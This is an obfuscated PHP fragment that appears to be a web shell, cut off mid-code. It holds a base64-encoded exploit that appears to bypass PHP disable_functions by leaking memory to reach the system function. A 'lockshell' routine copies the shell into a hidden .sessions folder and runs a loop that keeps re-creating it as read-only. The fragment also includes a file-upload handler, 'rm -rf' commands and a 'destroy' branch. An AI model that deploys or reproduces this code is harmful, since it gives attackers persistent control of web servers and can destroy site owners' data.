24\x67Z2V\x30X2Jhc\x32lj\x58\x32Z\x31bm\x4e\x7aKC\x52i\x59\x58N\x6c\x4cCAk\x5a\x57xm\x4b\x53\x427\x43iA\x67I\x43A\x67I\x43\x41g\x62\x47l\x7ad\x43\x67kZG\x460\x59V9\x68ZG\x52\x79\x4cC\x41\x6bdGV\x34\x64\x46\x39zaX\x70l\x4c\x43\x41\x6bZG\x460\x59\x569z\x61XplK\x53A\x39IC\x52lbG\x59\x37C\x69A\x67\x49CAg\x49C\x41\x67Zm\x39yKC\x52\x70\x49D\x30\x67\x4dD\x73g\x4aGk\x67\x50C\x41\x6b\x5aG\x460Y\x569z\x61Xpl\x49C\x38gO\x44s\x67JG\x6b\x72Kyk\x67\x65\x77og\x49\x43\x41g\x49C\x41g\x49\x43\x41g\x49CAk\x62G\x56\x68\x61y\x41\x39\x49\x47\x78lY\x57so\x4aG\x52hd\x47FfYWRkci\x77g\x4a\x47\x6bg\x4b\x69A\x34KT\x73\x4b\x49\x43\x41\x67\x49C\x41\x67\x49\x43\x41\x67ICAga\x57\x59o\x4aG\x78l\x59Wsg\x4cSAkY\x6dF\x7a\x5aS\x41+\x49\x44A\x67J\x69\x59g\x4aGx\x6c\x59W\x73g\x4cSAk\x59m\x46zZS\x418ICR\x6b\x59\x58Rh\x58\x32\x46\x6bZ\x48\x49\x67\x4cSAk\x59mF\x7aZ\x53\x6b\x67\x65\x77ogICAgI\x43A\x67I\x43Ag\x49C\x41\x67\x49\x43A\x67J\x47Rlc\x6dVm\x49D\x30gb\x47\x56\x68ayg\x6bb\x47V\x68ay\x6b7C\x69\x41\x67IC\x41g\x49CAg\x49CAg\x49\x43AgI\x43\x41\x6aIC\x64j\x622\x35\x7a\x64GF\x75\x64\x43\x63\x67\x59\x329uc3R\x68\x62\x6eQgY\x32h\x6cY\x32\x73K\x49C\x41gIC\x41g\x49CAgICAg\x49CA\x67\x49GlmKCR\x6bZ\x58\x4a\x6cZiA\x68PSAweDc0N\x6dU\x32M\x54\x63\x30\x4e\x7aM2\x5a\x54Z\x6d\x4ej\x4d\x70Ci\x41\x67I\x43AgI\x43AgIC\x41g\x49C\x41\x67I\x43AgI\x43\x41gY\x32\x39u\x64G\x6cu\x64\x57U\x37\x43iA\x67\x49CAg\x49CA\x67\x49C\x41\x67\x49\x480\x67\x5aW\x78\x7a\x5a\x53B\x6ab250aW5\x31\x5aTs\x4bCiA\x67\x49\x43\x41gI\x43A\x67\x49C\x41gI\x43RsZWFr\x49D0g\x62\x47Vha\x79gk\x5a\x47\x460YV9hZG\x52y\x4cCA\x6fJG\x6bgK\x79A0KSAqIDg\x70O\x77\x6fg\x49\x43\x41\x67I\x43\x41\x67IC\x41\x67ICBp\x5a\x69gk\x62G\x56\x68a\x79AtI\x43R\x69\x59X\x4elI\x44\x34g\x4dCAm\x4aiA\x6b\x62GV\x68\x61\x79AtIC\x52\x69Y\x58Nl\x49Dw\x67JG\x52\x68dG\x46\x66\x59W\x52kciAt\x49\x43R\x69YXNl\x4b\x53\x42\x37\x43\x69A\x67I\x43Ag\x49CAg\x49\x43\x41gIC\x41\x67\x49\x43\x41kZGV\x79\x5a\x57\x59gPS\x42\x73\x5a\x57\x46rK\x43Rs\x5aWFr\x4b\x54s\x4bIC\x41g\x49C\x41\x67IC\x41\x67I\x43A\x67ICAg\x49CMgJ\x32\x4a\x70b\x6aJoZ\x58gn\x49\x47Nv\x62n\x4e0Y\x5750\x49\x47NoZ\x57\x4e\x72Ci\x41\x67ICAg\x49CA\x67\x49\x43\x41gI\x43A\x67I\x43\x42\x70Z\x69g\x6b\x5aGV\x79ZWYg\x49\x54\x30gM\x48\x67\x33\x4fD\x591Njgz\x4d\x6aZ\x6c\x4ejk2\x4dikKI\x43AgIC\x41gIC\x41\x67I\x43A\x67\x49\x43AgI\x43A\x67\x49\x43\x42\x6ab2\x35\x30a\x57\x351\x5aT\x73KI\x43\x41gICAgI\x43\x41\x67\x49\x43A\x67f\x53\x42l\x62H\x4elI\x47\x4e\x76\x62n\x52pb\x6eV\x6c\x4f\x77oK\x49\x43\x41\x67IC\x41gIC\x41g\x49\x43Agc\x6dV\x30\x64\x58J\x75ICR\x6b\x59X\x52hX2F\x6b\x5a\x48\x49gKyA\x6baS\x41q\x49D\x677CiAg\x49CAgICAg\x66Q\x6f\x67\x49\x43\x41\x67fQoKI\x43A\x67IG\x5a1bm\x4e\x30\x61\x57\x39\x75\x49\x47\x64ldF9iaW\x35\x68c\x6el\x66Y\x6dF\x7a\x5aS\x67kY\x6dl\x75Y\x58J5X2xlYW\x73pI\x48\x73KI\x43\x41\x67\x49\x43AgI\x43\x41kYm\x46zZSA9\x49\x44A7\x43\x69\x41\x67\x49\x43A\x67I\x43\x41\x67JHN0Y\x58\x4a\x30\x49\x44\x30g\x4a\x47Jp\x62\x6dF\x79\x65\x56\x39\x73Z\x57\x46\x72\x49CY\x67\x4dHh\x6d\x5a\x6d\x5am\x5am\x5a\x6dZ\x6d\x5a\x6dZ\x6d\x5a\x6dMD\x41w\x4f\x77ogIC\x41gICA\x67\x49G\x5av\x63igkaSA9I\x44\x41\x37\x49\x43R\x70\x49\x44w\x67\x4dH\x67\x78\x4d\x44\x41w\x4f\x79A\x6baSsr\x4b\x53B7C\x69Ag\x49\x43\x41gICA\x67I\x43\x41\x67I\x43\x52\x68ZG\x52y\x49D\x30gJ\x48N\x30\x59\x58\x4a\x30I\x43\x30g\x4d\x48g\x78M\x44\x41\x77\x49Co\x67\x4a\x47k7C\x69\x41\x67\x49C\x41\x67\x49\x43\x41g\x49C\x41gICRs\x5aW\x46rID0g\x62\x47V\x68ay\x67k\x59W\x52\x6b\x63iwg\x4dCwg\x4e\x79\x6b\x37\x43\x69\x41g\x49CA\x67I\x43Ag\x49CAg\x49G\x6cm\x4bC\x52\x73Z\x57\x46r\x49D09\x49\x44B\x34M\x54Ax\x4dD\x490\x4e\x6aRj\x4eDU3Z\x69kg\x65\x79A\x6aIE\x56\x4dRiB\x6f\x5a\x57\x46k\x5a\x58I\x4bI\x43Ag\x49C\x41\x67\x49C\x41\x67I\x43A\x67\x49CA\x67IHJ\x6cdH\x56\x79biAk\x59\x57\x52\x6bcj\x73K\x49C\x41\x67IC\x41gI\x43A\x67\x49CA\x67f\x51o\x67\x49\x43\x41\x67\x49C\x41\x67IH0\x4b\x49\x43Ag\x49H\x30KC\x69AgIC\x42m\x64\x575\x6ad\x47lvbi\x42nZ\x58Rf\x633\x6c\x7a\x64G\x56\x74K\x43\x52\x69\x59\x58\x4ep\x59\x319\x6d\x64W\x35jc\x79\x6b\x67e\x77og\x49C\x41g\x49CAgIC\x52h\x5a\x47R\x79\x49D\x30\x67JGJh\x63\x32\x6c\x6aX2Z1b\x6dNz\x4fw\x6f\x67\x49\x43A\x67\x49\x43AgIG\x52vI\x48\x73KIC\x41g\x49CA\x67\x49\x43\x41gICAgJGZ\x66\x5aW\x350c\x6ek\x67\x50S\x42\x73ZW\x46\x72K\x43R\x68\x5aGR\x79\x4b\x54s\x4b\x49CA\x67\x49\x43\x41\x67\x49C\x41gIC\x41g\x4aG\x5a\x66bm\x46\x74\x5a\x53A\x39I\x47\x78\x6cYW\x73oJ\x47\x5af\x5aW50cn\x6b\x73I\x44\x41\x73\x49DYpOwo\x4b\x49CAgI\x43\x41g\x49CA\x67ICA\x67aWY\x6f\x4a\x47\x5af\x62mFtZS\x419P\x53A\x77eD\x5a\x6bN\x6a\x55\x33N\x44czNzk3M\x79kge\x79A\x6aI\x48N5\x63\x33\x52\x6c\x62\x51\x6f\x67\x49\x43\x41\x67\x49\x43\x41gI\x43\x41g\x49CA\x67\x49\x43A\x67cmV\x30d\x58\x4au\x49G\x78lY\x57soJGFk\x5a\x48\x49g\x4by\x414KT\x73KI\x43\x41g\x49\x43\x41gIC\x41\x67ICAgf\x51o\x67I\x43AgI\x43\x41g\x49\x43AgI\x43\x41\x6bYW\x52\x6b\x63\x69\x41\x72\x50\x53A\x77\x65D\x49\x77O\x77\x6fg\x49CA\x67IC\x41gI\x48\x30\x67d\x32hpb\x47\x55\x6f\x4a\x47\x5a\x66ZW5\x30cn\x6bg\x49T\x30\x67\x4d\x43\x6b7\x43\x69AgI\x43\x41\x67IC\x41g\x63mV0\x64\x58J\x75IGZhbH\x4e\x6cOw\x6f\x67I\x43\x41g\x66Q\x6f\x4b\x49CAgIG\x5a\x31\x62m\x4e0\x61\x579u\x49HR\x79\x61\x57\x64\x6e\x5a\x58JfdWF\x6dKC\x52\x68\x63m\x63\x70\x49H\x73KI\x43\x41g\x49CAgI\x43AjIH\x4e0cl9\x7a\x61\x48\x56\x6dZ\x6dx\x6c\x49\x48\x42y\x5a\x58\x5a\x6cbn\x52zIG9\x77\x59\x32\x46ja\x47U\x67\x63\x33Rya\x575\x6eI\x47l\x75dGVybmlu\x5awo\x67ICA\x67\x49CAgI\x43Rh\x63mc\x67PSB\x7a\x64\x48J\x66\x632h\x31\x5amZsZS\x68zdH\x4a\x66cmV\x77\x5a\x57\x46\x30KCdB\x4a\x79w\x67N\x7a\x6b\x70\x4bT\x73\x4b\x49\x43A\x67\x49\x43AgICAkd\x6eV\x73\x62\x69A9I\x47\x35\x6cd\x79\x42Wd\x57\x78\x75\x4bC\x6b\x37\x43iA\x67\x49CA\x67\x49\x43\x41gJH\x5a1bG\x34t\x50\x6dE\x67P\x53\x41kY\x58\x4anO\x77\x6f\x67\x49C\x41g\x66\x51oK\x49\x43\x41gIG\x6cmKHN\x30cmlz\x64\x48IoU\x45\x68\x51X\x309TL\x43AnV\x30l\x4f\x4a\x79kpIH\x73\x4bI\x43\x41g\x49C\x41\x67IC\x42k\x61\x5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\x6f\x61X\x4dg\x55\x479\x44IGlz\x49G\x5a\x76\x63\x69\x41\x71\x62m\x6c4\x49H\x4e\x35c\x33\x52\x6c\x62\x58\x4dg\x6225\x73eS\x34nKTs\x4bICA\x67IH0\x4b\x43\x69\x41g\x49\x43Akbl\x39\x68bG\x78\x76\x59y\x419ID\x45\x77Oy\x41\x6aI\x47lu\x59\x33\x4a\x6cY\x58Nl\x49H\x52oa\x58\x4d\x67\x64\x6d\x46s\x64WU\x67\x61W\x59gV\x55FG\x49\x47\x5a\x68\x61\x57\x78z\x43iAg\x49\x43\x41kY\x329u\x64G\x6c\x6ed\x579\x31\x63\x79\x419I\x46\x74\x64\x4fwogIC\x41\x67\x5am9yK\x43\x52p\x49D\x30g\x4d\x44\x73g\x4aGk\x67PCAkbl\x39hbG\x78v\x59z\x73\x67JGkr\x4b\x79\x6b\x4bI\x43\x41gI\x43Ag\x49\x43Ak\x59\x32\x39udGl\x6e\x64\x5791\x631t\x64ID0g\x63\x33\x52yX\x33\x4eodWZ\x6d\x62GUo\x633R\x79X3J\x6c\x63G\x56hdCg\x6e\x51\x53\x63sI\x44c5K\x53k\x37C\x67o\x67\x49CAgdH\x4apZ2\x64lc\x6c91\x59\x57\x59\x6f\x4a3g\x6e\x4b\x54s\x4bICA\x67I\x43Rh\x59\x6dM\x67\x50\x53\x41\x6b\x59mFj\x613Ry\x59W\x4e\x6c\x57zF\x64W\x79\x64hcmdz\x4a\x31\x31bM\x46\x30\x37\x43g\x6f\x67\x49C\x41\x67\x4a\x47hlbHBl\x63\x69A9IG5\x6c\x64\x79B\x49ZW\x78\x77ZX\x497\x43\x69AgICAk\x61G\x56\x73c\x47\x56\x79LT5\x69\x49D0\x67\x5an\x56u\x59\x33\x52pb24\x67KCR4\x4b\x53\x427IH07C\x67\x6fg\x49\x43\x41\x67a\x57\x59\x6f\x633\x52yb\x47VuK\x43\x52h\x59\x6d\x4dpID\x309IDc\x35\x49Hx\x38I\x48N0c\x6dxl\x62i\x67\x6bYW\x4a\x6a\x4b\x53A\x39PSAw\x4b\x53\x427\x43\x69Ag\x49CAgICA\x67\x5a\x47\x6c\x6cKCJ\x56\x51\x55\x59g\x5amF\x70\x62\x47VkIi\x6b\x37CiAgICB\x39\x43\x67o\x67ICAgIyBs\x5aW\x46rcwo\x67\x49\x43\x41g\x4a\x47N\x73b3\x4e\x31c\x6dV\x66\x61GFuZGxlc\x6e\x4d\x67P\x53Bz\x64H\x49\x79cH\x52\x79K\x43\x52hY\x6dM\x73IDA\x70\x4f\x77o\x67ICAgJ\x48B\x6fcF9\x6f\x5a\x57FwI\x440\x67\x633\x52y\x4dn\x420ci\x67k\x59WJ\x6a\x4cCA\x77\x65D\x554\x4bTs\x4b\x49\x43A\x67\x49\x43R\x68YmNfY\x57\x52kc\x69A9\x49\x43Rwa\x48\x42f\x61G\x56h\x63CA\x74IDB\x34Yzg7\x43g\x6fgICA\x67IyBm\x59Wtl\x49\x48Zh\x62\x48Vl\x43i\x41\x67\x49\x43\x42\x33c\x6d\x6c0\x5aSgkYWJ\x6a\x4cC\x41w\x65\x44\x59wL\x43A\x79K\x54\x73KI\x43Ag\x49\x48d\x79\x61X\x52lK\x43R\x68Y\x6dMs\x49DB4Nz\x41\x73I\x44YpO\x77\x6fK\x49\x43\x41\x67\x49\x43M\x67Z\x6d\x46\x72\x5a\x53By\x5aW\x5alc\x6dVu\x592UK\x49CA\x67IH\x64yaX\x52l\x4bC\x52h\x59\x6dM\x73I\x44\x424\x4d\x54\x41\x73I\x43\x52h\x59\x6d\x4e\x66\x59WRk\x63i\x41\x72I\x44\x424NjA\x70\x4fwog\x49C\x41g\x64\x33J\x70dG\x55o\x4aGF\x69Y\x79\x77\x67\x4d\x48gx\x4f\x43\x77\x67M\x48\x68\x68\x4b\x54\x73\x4bC\x69\x41\x67\x49CA\x6b\x592x\x76c\x33\x56\x79Z\x56\x39\x76\x59mogP\x53B\x7a\x64H\x49\x79\x63\x48R\x79K\x43\x52\x68\x59m\x4dsIDB\x34\x4d\x6a\x41\x70\x4fw\x6f\x4bICAg\x49C\x52ia\x57\x35hcnlf\x62\x47\x56\x68\x61y\x41\x39\x49\x47xlYWs\x6fJGN\x73b\x33\x4e\x31\x63mV\x66aG\x46u\x5a\x47xl\x63n\x4d\x73\x49\x44g\x70\x4fwog\x49\x43Ag\x61W\x59oISg\x6b\x59m\x46zZSA9\x49\x47d\x6cd\x469ia\x575hc\x6e\x6cf\x59\x6d\x46z\x5a\x53gk\x59\x6d\x6cu\x59\x58J\x35\x58\x32\x78\x6cYW\x73p\x4b\x53k\x67\x65wo\x67\x49\x43AgI\x43\x41gI\x47R\x70Z\x53\x67i\x51291\x62G\x52\x75\x4a3\x51\x67Z\x47V0\x5a\x58J\x74aW5l\x49GJ\x70\x62\x6d\x46\x79eS\x42i\x59\x58\x4e\x6cIGF\x6bZH\x4a\x6cc3\x4d\x69K\x54sK\x49C\x41gIH\x30KC\x69\x41g\x49C\x42pZ\x69\x67\x68\x4b\x43\x52lb\x47Y\x67PSBwYX\x4a\x7a\x5a\x56\x39lbGY\x6fJGJ\x68c2UpKS\x6b\x67e\x77\x6f\x67ICA\x67ICA\x67IG\x52pZSg\x69\x51\x329\x31\x62\x47\x52u\x4a\x33\x51\x67\x63GFyc\x32U\x67R\x55\x78GI\x47hl\x59W\x52l\x63iIpO\x77\x6f\x67ICAgf\x51\x6fK\x49\x43AgI\x47\x6c\x6dKC\x45\x6f\x4a\x47Jh\x63\x32\x6c\x6a\x58\x32Z1\x62mN\x7a\x49D0\x67Z2V\x30X2Jhc2\x6cj\x582Z\x31bm\x4e\x7a\x4b\x43\x52\x69Y\x58Nl\x4cC\x41kZW\x78m\x4bS\x6b\x70\x49\x48s\x4b\x49CAgICA\x67I\x43\x42k\x61\x57UoI\x6bN\x76\x64Wx\x6bb\x69\x64\x30\x49\x47d\x6c\x64\x43Bi\x59XN\x70Y1\x39mdW\x35\x6adGlvb\x6e\x4d\x67Y\x57R\x6b\x63\x6dVzc\x79\x49\x70O\x77\x6fgIC\x41\x67\x66\x51o\x4bICAgIGlm\x4bCE\x6fJ\x48pp\x5a\x6c\x39\x7aeXN\x30ZW\x30\x67PSBnZ\x58R\x66c3\x6c\x7a\x64\x47V\x74\x4bCRiYXNpY19md\x57\x35\x6a\x63y\x6bp\x4b\x53B7\x43\x69Ag\x49\x43A\x67ICAg\x5a\x47\x6cl\x4b\x43\x4a\x44b\x33\x56s\x5a\x474nd\x43\x42\x6e\x5a\x58Qg\x65\x6d\x6cm\x583N5c3\x52lb\x53BhZG\x52y\x5a\x58Nz\x49\x69k\x37C\x69Ag\x49\x43\x42\x39Cgo\x67\x49CA\x67\x49yB\x6dY\x57tlI\x47N\x73b3\x4e1cmU\x67b2\x4a\x71\x5aWN\x30C\x69\x41\x67IC\x41k\x5amF\x72ZV\x39\x76\x59\x6dp\x66b2Zm\x632\x560\x49D0\x67MHhk\x4d\x44\x73\x4bICA\x67I\x47Z\x76ci\x67\x6b\x61S\x41\x39I\x44\x417IC\x52pIDwgMHg\x78MTA7\x49CR\x70ICs\x39\x49D\x67pI\x48\x73\x4b\x49\x43A\x67I\x43A\x67\x49\x43B3\x63ml\x30Z\x53\x67\x6bY\x57\x4ajL\x43\x41kZ\x6dF\x72\x5a\x56\x39\x76\x59\x6d\x70\x66b\x32\x5a\x6d\x63\x32\x56\x30IC\x73gJG\x6bsIG\x78\x6cYW\x73\x6fJ\x47N\x73\x62\x33N1\x63\x6d\x56\x66b\x32\x4a\x71\x4c\x43\x41k\x61S\x6b\x70\x4fw\x6fgI\x43A\x67\x66\x51\x6f\x4b\x49C\x41\x67\x49C\x4dgc\x48du\x43i\x41gI\x43B3\x63\x6dl\x30\x5aSgk\x59\x57\x4a\x6aL\x43A\x77\x65D\x49\x77LC\x41k\x59WJj\x582F\x6b\x5a\x48\x49\x67\x4byAk\x5amFrZ\x56\x39vYm\x70fb\x32\x5a\x6d\x63\x32V\x30K\x54s\x4bICA\x67I\x48\x64\x79\x61XRlKCR\x68YmMsIDB4Z\x44A\x67\x4byAweDM4LC\x41\x78\x4cC\x41\x30\x4bT\x73gIy\x42p\x62nR\x6c\x63\x6d\x35\x68bC\x42\x6d\x64W5\x6aI\x48R5\x63GUK\x49CA\x67\x49H\x64y\x61X\x52\x6cK\x43\x52hY\x6d\x4dsI\x44\x42\x34Z\x44\x41g\x4byAw\x65\x44\x59\x34\x4cCA\x6b\x65\x6dl\x6dX3\x4e\x35c\x33\x52lb\x53\x6b\x37I\x43M\x67\x61\x5750ZXJ\x75YW\x77gZ\x6e\x56u\x59yB\x6f\x59\x575kb\x47\x56y\x43g\x6fgI\x43\x41\x67K\x43Ro\x5aW\x78\x77\x5a\x58I\x74P\x6d\x49\x70K\x43Rj\x62\x57\x52kKT\x73\x4bf\x51\x3d\x3d";${$ufwoetu}[28](".t\x65rm-b\x79p\x61\x73s",base64_decode(${${"\x47\x4c\x4f\x42\x41LS"}["\x62rvk\x6bg"]}));}}if(isset($_GET["\x6c\x6f\x63\x6b\x73h\x65\x6cl"])){$wfuedrdelj="\x63\x75\x72\x46\x69\x6ce";$oipdekpdtj="f\x75\x6e\x67s\x69";$oatgbgjljs="\x63\x75r\x46\x69\x6c\x65";$teymcgmb="c\x75\x72\x46i\x6ce";${"GLO\x42\x41L\x53"}["j\x67\x66c\x7a\x71\x65\x77p"]="fun\x67\x73i";${${"\x47L\x4f\x42\x41\x4cS"}["w\x68g\x78\x6e\x6a\x6ev\x6cm"]}=trim(basename($_SERVER["\x53\x43\x52\x49\x50\x54\x5f\x46\x49\x4c\x45\x4e\x41\x4d\x45"]));${"\x47L\x4fB\x41\x4c\x53"}["c\x77u\x62ffo\x67y\x71h"]="cu\x72\x46\x69le";${"\x47\x4c\x4f\x42A\x4cS"}["\x64m\x6b\x63\x65g\x6d"]="\x54m\x70\x4e\x61m\x65s";${"G\x4c\x4f\x42AL\x53"}["rh\x69\x65l\x72\x66\x65bj\x76"]="\x63\x75r\x46i\x6c\x65";${"G\x4c\x4fBA\x4c\x53"}["\x6dd\x73\x6d\x6d\x76"]="\x66\x75n\x67si";${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6cs\x63mcd\x70\x77lpu\x6a"]}=${${"GL\x4f\x42A\x4c\x53"}["hgu\x61\x6e\x71\x64d"]}[31]();${"\x47L\x4fB\x41\x4c\x53"}["i\x77\x6f\x6b\x73\x6e\x66cne\x73"]="cu\x72\x46\x69l\x65";${"G\x4c\x4fB\x41\x4c\x53"}["\x6cd\x76\x62\x6f\x62\x78\x62v\x78d"]="\x66u\x6eg\x73\x69";if(file_exists(${${"G\x4c\x4fB\x41L\x53"}["\x6cs\x63\x6dc\x64\x70\x77\x6cp\x75j"]}."/\x2e\x73\x65s\x73\x69\x6fns/.".base64_encode(${${"\x47\x4c\x4fBAL\x53"}["hg\x75a\x6eq\x64\x64"]}[0]().remove_dot(${$wfuedrdelj})."-handl\x65r"))&amp;&amp;file_exists(${${"\x47LO\x42A\x4cS"}["\x64mk\x63e\x67m"]}."/\x2esess\x69\x6f\x6es/.".base64_encode(${$oipdekpdtj}[0]().remove_dot(${${"GLOBA\x4c\x53"}["\x63\x77\x75\x62ffogy\x71\x68"]})."-\x74e\x78\x74"))){${"\x47\x4c\x4fBA\x4c\x53"}["l\x6b\x6f\x72\x61gz\x79\x69v\x68\x75"]="\x54\x6dpN\x61m\x65s";$zmtturx="f\x75n\x67\x73\x69";cmd("\x72\x6d\x20-rf\x20".${${"G\x4c\x4f\x42\x41L\x53"}["\x6c\x6b\x6fr\x61gzy\x69v\x68\x75"]}."/\x2e\x73\x65\x73si\x6f\x6e\x73/\x2e".base64_encode(${$zmtturx}[0]().remove_dot(${${"\x47L\x4fB\x41\x4cS"}["\x77hg\x78\x6e\x6an\x76\x6cm"]})."-\x74ext"));$oeflolw="\x66\x75\x6e\x67\x73\x69";${"\x47LOB\x41\x4cS"}["\x72\x61v\x76\x6a\x77gq\x69\x73\x61"]="\x54m\x70\x4ea\x6d\x65\x73";cmd("r\x6d -r\x66 ".${${"\x47\x4c\x4f\x42\x41L\x53"}["\x72\x61\x76\x76\x6a\x77\x67q\x69\x73a"]}."/.s\x65s\x73\x69\x6f\x6e\x73/\x2e".base64_encode(${$oeflolw}[0]().remove_dot(${${"G\x4c\x4f\x42\x41\x4cS"}["wh\x67\x78\x6e\x6a\x6e\x76\x6c\x6d"]})."-\x68a\x6edle\x72"));}$bknusgrt="\x63\x75rFi\x6c\x65";mkdir(${${"GL\x4fBA\x4c\x53"}["ls\x63\x6d\x63\x64\x70\x77l\x70\x75j"]}."/.\x73es\x73i\x6f\x6e\x73");cmd("\x63p\x20$curFile ".${${"G\x4cO\x42AL\x53"}["\x6c\x73cm\x63dpwl\x70\x75j"]}."/\x2es\x65s\x73\x69\x6fn\x73/\x2e".base64_encode(${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x68gu\x61\x6eq\x64\x64"]}[0]().remove_dot(${${"\x47LO\x42\x41\x4c\x53"}["\x72\x68\x69\x65\x6c\x72\x66e\x62\x6a\x76"]})."-\x74\x65xt"));chmod(${$oatgbgjljs},0444);${"\x47L\x4f\x42\x41\x4c\x53"}["me\x67\x79\x66\x6f\x6d\x6c\x74\x75pd"]="\x68\x61\x6e\x64\x6c\x65\x72";${${"\x47\x4c\x4fBA\x4c\x53"}["\x74o\x64wx\x6ffgc\x70"]}="\n\x3c?ph\x70\n\x40\x69ni_s\x65\x74(\x22m\x61x_e\x78\x65\x63ution\x5f\x74im\x65\", \x30)\x3b\n\x77\x68\x69l\x65 (\x54\x72\x75\x65){\n    \x69f (!f\x69\x6ce\x5f\x65x\x69s\x74s(\"".__DIR__."\x22)){\n   \x20\x20 \x20\x20\x6d\x6bdi\x72(\x22".__DIR__."\x22);\n \x20\x20\x20}\n\x20 \x20\x20i\x66 (!f\x69le_\x65\x78i\x73ts(\x22".${${"G\x4c\x4fB\x41L\x53"}["ld\x76\x62\x6f\x62\x78\x62\x76\x78\x64"]}[0]()."/".${${"\x47L\x4f\x42\x41\x4c\x53"}["\x77h\x67x\x6e\x6a\x6evl\x6d"]}."\")){\n     \x20 \x20\$te\x78\x74 =\x20b\x61\x73\x65\x36\x34_en\x63\x6f\x64e(\x66\x69l\x65_g\x65t_c\x6f\x6et\x65n\x74\x73(\"".${${"\x47\x4cOB\x41\x4cS"}["\x6cs\x63m\x63d\x70\x77\x6cp\x75\x6a"]}."/.\x73e\x73sions/.".base64_encode(${${"G\x4c\x4fB\x41\x4cS"}["\x6d\x64\x73mm\x76"]}[0]().remove_dot(${$teymcgmb})."-t\x65\x78\x74")."\"));\n\x20 \x20\x20\x20\x20\x20 \x66\x69l\x65\x5fp\x75t_c\x6fntent\x73(\"".${${"\x47\x4c\x4fBA\x4c\x53"}["jg\x66\x63\x7a\x71\x65w\x70"]}[0]()."/".${${"\x47L\x4fBALS"}["w\x68\x67\x78\x6e\x6a\x6e\x76\x6c\x6d"]}."\x22, b\x61se64_d\x65code(\$tex\x74))\x3b\n  \x20 }\n\x20   if (\x67\x65cko\x5fp\x65\x72\x6d(\x22".${${"G\x4cO\x42\x41\x4c\x53"}["h\x67\x75\x61nq\x64\x64"]}[0]()."/".${${"\x47\x4c\x4fB\x41\x4c\x53"}["w\x68\x67\x78\x6e\x6a\x6evlm"]}."\x22)\x20!=\x20\x30\x34\x344){\n    \x20 \x20 \x63\x68\x6d\x6fd(\x22".${${"\x47L\x4f\x42A\x4c\x53"}["\x68g\x75\x61\x6e\x71dd"]}[0]()."/".${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x69\x77\x6f\x6b\x73n\x66cn\x65\x73"]}."\x22, 0\x34\x344);\n \x20 \x20}\n   \x20i\x66 (g\x65\x63ko_pe\x72m(\"".__DIR__."\")\x20!\x3d 0\x35\x35\x35){\n  \x20\x20 \x20\x20\x20chmo\x64(\x22".__DIR__."\x22,\x200\x3555);\n\x20\x20\x20\x20}\n}\n\n\x66\x75n\x63t\x69o\x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67\x65c\x6b\x6f\x5f\x70\x65r\x6d(\$\x66\x6cename){\n \x20\x20 \x72\x65t\x75\x72n \x73\x75b\x73tr(\x73p\x72\x69\x6etf(\"\x25\x6f\x22,\x20f\x69\x6ce\x70\x65\x72\x6d\x73(\$\x66le\x6ea\x6d\x65)),\x20-4)\x3b\n}\n";${${"\x47LO\x42\x41\x4c\x53"}["l\x79\x68\x7ah\x69\x78\x64\x75"]}=${${"G\x4cO\x42\x41L\x53"}["\x68\x67\x75\x61\x6e\x71\x64\x64"]}[28](${${"\x47L\x4f\x42AL\x53"}["\x6c\x73\x63\x6d\x63d\x70w\x6c\x70u\x6a"]}."/\x2esessio\x6es/\x2e".base64_encode(${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x68gu\x61\x6e\x71\x64d"]}[0]().remove_dot(${$bknusgrt})."-\x68a\x6edler")."",${${"\x47\x4c\x4f\x42\x41\x4cS"}["m\x65g\x79\x66\x6fml\x74\x75\x70d"]});if(${${"\x47\x4cOB\x41L\x53"}["\x6cy\x68\x7ahix\x64u"]}){$odlraywp="\x63ur\x46\x69\x6ce";cmd(PHP_BINARY.${${"G\x4c\x4f\x42\x41\x4cS"}["l\x73\x63\x6d\x63\x64p\x77\x6cpuj"]}."/\x2e\x73ess\x69o\x6es/\x2e".base64_encode(${${"\x47\x4c\x4f\x42\x41L\x53"}["h\x67\x75\x61n\x71\x64d"]}[0]().remove_dot(${$odlraywp})."-h\x61\x6e\x64\x6cer")."\x20&gt;\x20/\x64e\x76/\x6eu\x6cl \x32&gt;/\x64ev/\x6e\x75ll &amp;");success();}else{failed();}}if(isset($_POST["\x67\x65\x63\x6b\x6f-up-\x73\x75\x62\x6d\x69\x74"])){$vldggige="t\x6d\x70N\x61m\x65";$vuithck="n\x61\x6da\x46\x69len\x79\x61";${"\x47\x4c\x4f\x42\x41L\x53"}["\x70z\x78\x6c\x6a\x64"]="\x6ea\x6da\x46ile\x6e\x79a";$dvukgngvg="\x66un\x67\x73\x69";${${"\x47LO\x42ALS"}["pz\x78\x6c\x6ad"]}=$_FILES["g\x65ck\x6f-\x75pl\x6fad"]["\x6e\x61m\x65"];${"\x47\x4c\x4fB\x41\x4cS"}["b\x70\x77\x6b\x65\x67r"]="\x66\x75\x6e\x67\x73i";${$vldggige}=$_FILES["\x67\x65\x63\x6bo-\x75pl\x6f\x61d"]["t\x6dp_n\x61me"];if(${${"\x47LO\x42A\x4c\x53"}["bp\x77\x6b\x65g\x72"]}[29](${${"G\x4c\x4fBA\x4c\x53"}["\x66\x79\x69\x6d\x79i\x7a\x62x\x75"]},${$dvukgngvg}[0]()."/".${$vuithck})){success();}else{failed();}}if(isset($_GET["d\x65s\x74\x72oy"])){${"\x47L\x4f\x42ALS"}["vxnw\x6d\x6d\x7a\x69\x71k\x62"]="\x44\x4fC_\x52\x4f\x4fT";${"GL\x4fB\x41\x4c\x53"}["\x75\x76\x77\x64\x63\x6e\x67do"]="\x66u\x6e\x67\x73\x69";${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x76\x78\x6e\x77\x6d\x6dzi\x71kb"]}=$_SERVER["\x44\x4f\x43\x55\x4d\x45\x4e\x54\x5f\x52\x4f\x4f\x54"];${${"\x47L\x4f\x42\x41L\x53"}["\x6c\x67\x6fk\x6c\x74b\x6be"]}=trim(basename($_SERVER["\x53\x43\x52\x49\x50\x54\x5f\x46\x49\x4c\x45\x4e\x41\x4d\x45"]));if(${${"G\x4c\x4fB\x41\x4c\x53"}["\x75\x76\x77dcng\x64\x6f"]}[4](${${"GL\x4f\x42A\x4cS"}["kx\x6big\x61\x75\x65p"]})){$mdbrnxgosgm="h\x74\x61cc\x65\x73s";$taztpb="\x44\x4fC\x5f\x52\x4f\x4fT";$vbxxor="C\x75r\x72e\x6e\x74F\x69\x6c\x65";$wympdlrcl="h\x74\x61c\x63e\x73s";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x69\x79\x67te\x69h